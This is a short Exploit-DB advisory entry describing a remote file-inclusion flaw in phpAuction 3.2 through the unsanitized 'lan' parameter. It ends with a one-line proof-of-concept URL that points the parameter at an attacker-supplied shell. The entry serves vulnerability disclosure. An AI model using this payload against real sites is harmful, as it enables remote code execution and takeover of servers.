phpAuction 3.2 - 'lan' Remote File Inclusion

EDB-ID:

33204


Platform:

PHP

Published:

2009-09-09

source: http://www.securityfocus.com/bid/36211/info

phpAuction is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the computer; other attacks are also possible.

phpAuction 3.2 is vulnerable; other versions may also be affected.

http://www.example.com/auction/index.php?lan=Evilshell